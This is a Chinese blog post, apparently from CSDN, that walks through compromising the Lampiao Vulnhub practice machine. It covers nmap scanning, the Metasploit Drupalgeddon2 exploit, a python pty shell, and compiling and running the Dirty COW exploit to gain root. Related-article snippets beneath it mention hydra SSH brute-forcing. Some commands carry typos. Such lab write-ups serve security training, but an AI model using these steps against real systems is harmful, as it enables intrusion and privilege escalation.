靶机Lampiao入侵实战

最新推荐文章于 2023-06-05 15:52:49 发布
最新推荐文章于 2023-06-05 15:52:49 发布
阅读量160 收藏
点赞数 1
分类专栏: Vulnhub靶机实操 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75774378/article/details/130367921
版权

因为lampiao账号密码未知的,使用主机扫描,

1、扫描网络中活动的主机

扫描192.168.29.0/24网络中活动的主机,从而获取靶机IP地址

nmap -sP 192.168.163.0/24

找到:192.168.163.142

 

 

2、扫描主机开放的端口和服务

扫描结果我们基本可以确定目标靶机的ip为192.168.163.142

nmap -p 1-65535 - -sV 192.168.163.142命令进行端口扫描

开启了22、80、1898端口

 分别访问了22、80、1898端口;22端口无法访问;80端口如下,

1898端口如下

 

3、扫描主机的操作系统和版本号

nmap -O 192.168.163.142

(4)扫描主机可能存在的已知漏洞

Nmap --script=vuln -p22,80,1898 192.163.142

没有找到任何漏洞

 

nessus扫描

 

在目录中发现了robots.txt文件

 

查看CHANGELOG.txt文件,发现网站的版本信息


msfconsole //启动msf

Search drupal

 尝试了第一个结果失败

 

尝试第二个:1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection

 

设置主机,端口等,运行漏洞

pwd是目标主机的工作目录,getuid #查看当前登录的账号,www-data是普通用户

 继续提权

脏牛漏洞

searchsploit dirty

 

上传漏洞的源码到靶机上

meterpreter > upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

 

使用python调出交互模式

python -c "import pty; pty.spawn('/bin/bash')"


g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -luti

./dcow -s运行

提权成功

 

橙子煮水
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-1靶机渗透
weixin_62485906的博客
06-23 1303
关于kali渗透DC-1靶机
靶场练习之Lampiao
qq_52360932的博客
02-28 6012
Lampiao靶场练习
Lampiao靶场渗透
weixin_65582330的博客
06-05 319
这时候我们可以用得到的密码字典去拿hydra九头蛇进行ssh端口爆破,hydra -l tiago -P password.txt 192.168.101.133 ssh(“l”是用指定的用户名,“L”是用用户名字典,p和P同理),可以看到爆破成功,账号为tiago,密码为Virgulino。1.内核提权---脏牛提权最为典型 ,内核提权一般包括3个步骤,信息收集发现版本号,找到相关版本的exp,使用找到的exp对目标发起攻击,完成提权功能。pty.spawn("/bin/bash")'获取到真终端。
入侵靶机DC-7
干铮的博客
10-08 1453
DC-7 1.主机发现 靶机开机后DHCP获取有ip地址 2.信息收集 端口扫描 C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±?? Nmap scan report for dc-7 (192.168.43.111) Host is up (0.00030s latency). Not s
VulnHub靶场之Lampiao
A_dmin的博客
10-16 1483
VulnHub靶场之Lampiao 最近事情有点多,但是还是要抽出点时间来学习的!!! 老样子,Lampiao虚拟机先启动,然后再启动kali!! Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!..
nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河
m0_59302403的博客
03-22 3498
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
靶机happycorp实战练习
09-08
学习
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
lampiao靶场入侵检测
kunkun_xiaomeng的博客
09-10 977
lampiao初体验
渗透测试实战-Fowsniff靶机入侵
大方子
11-27 3978
机安装/下载 Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A   Kali的IP地址:192.168.100.8 WIN7的IP地址:192.168.100.9     先用nmap 进行探测 发现目标的IP地址为192.168.100.12 然后在进行靶机端口的探测 先从80端口下手看看 ...
渗透测试实战8——SickOS靶机入侵
浅浅的博客
05-10 3116
目录 一、实验环境 二、实验步骤 主动信息收集 端口探测——22端口 端口探测——80端口 1、目录探测 2、获取shell 3、提权 4、防火墙规则 一、实验环境 攻击机(Kali):192.168.247.181 靶机(SickOS):192.168.247.180 二、实验步骤 主动信息收集 1、主机发现 2、端口扫描 目标靶机开放8180端口和22...
渗透测试实战4——Node靶机入侵
浅浅的博客
04-25 1319
一、实验环境 攻击机(Kali):192.168.247.149 靶机(Node):192.168.247.152 二、实验步骤 一)主动信息收集 1、主机发现 2、端口扫描 3、端口版本信息 扫描结果发现靶机开启了22 ssh端口和3000端口,且3000端口开放的是http服务。 二)端口探测 端口3000(http服务) 1、探测目录 因为htt...
入侵靶机DC-1
干铮的博客
08-13 356
1.主机发现 namp -sP 10.3.139.0/24 2.指纹收集 whatweb 10.3.139.96 3.目录爆破 4.根据版本查询相应漏洞 根据版本可查出Drupa7.x存在远程代码执行漏洞 5.使用msf进行漏洞利用 DC-1一共有5个flag flag3需要登录数据库查找 python -c 'import pty;pty.spawn("/bin/bash")' ...
利用kali下的msf入侵靶机
ro4lsc的博客
01-16 9871
前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)
Kali渗透测试——利用metasploit攻击靶机WinXP SP1
dif90304的博客
05-19 1002
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配置WinXP SP1靶机的IP地址 执行漏洞利用 后漏洞利用:meterpreter> ...
入侵靶机DC-5
干铮的博客
10-04 382
1.主机扫描 通过已知MAC地址,确定DC-5的ip。 2.端口扫描 确定靶机开放端口 3.访问web界面 提交表单发现时间在变化 直接访问thankyou.php文件 这里可能存在文件包含 4.web目录扫描 ...
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙子煮水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值